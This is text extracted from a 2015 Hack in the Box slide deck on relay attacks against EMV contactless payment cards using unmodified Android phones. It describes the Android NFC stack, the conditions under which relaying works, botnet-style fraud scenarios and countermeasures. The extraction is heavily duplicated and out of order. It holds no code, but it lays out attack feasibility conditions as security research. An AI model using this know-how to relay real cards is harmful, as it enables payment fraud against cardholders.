3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
